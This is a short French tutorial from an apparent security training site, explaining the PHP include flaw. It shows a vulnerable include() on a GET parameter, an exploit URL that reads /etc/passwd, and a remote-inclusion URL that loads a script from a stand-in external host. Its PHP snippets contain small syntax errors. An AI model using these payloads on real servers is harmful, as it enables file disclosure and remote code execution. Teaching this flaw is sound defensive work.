Hackmyfortress - Training Center - En/Fr

Adrien-fr
5,954 views

Open Source Your Knowledge, Become a Contributor

Technology knowledge has to be shared and made accessible for free. Join the movement.

Create Content

La faille include

La fonction include() en PHP sert a exécuter du code php qui se situe dans un autre fichier. Exemple:

<?php

include(bth.php)

Dans ce cas, c'est le code dans bth.php qui sera exécuté.

Si par contre le développeur écrit ce code :

<?php

include($_GET('file'));

Pour exploiter cette faille, on peut utiliser l'URL suivante :

monsite.tld/index.php?file=/etc/passwd

Ici la fonction "include" va inclure le texte du fichier "/etc/passwd", et donc afficher son contenu. Il est possible de changer "/etc/passwd" en un autre fichier du serveur qui n'est normalement pas accesible, ou même par du code distant accessible sur un autre serveur.

Exemple :

monsite.tld/index.php?file=http://badsite.tmld/script.txt

Open Source Your Knowledge: become a Contributor and help others learn. Create New Content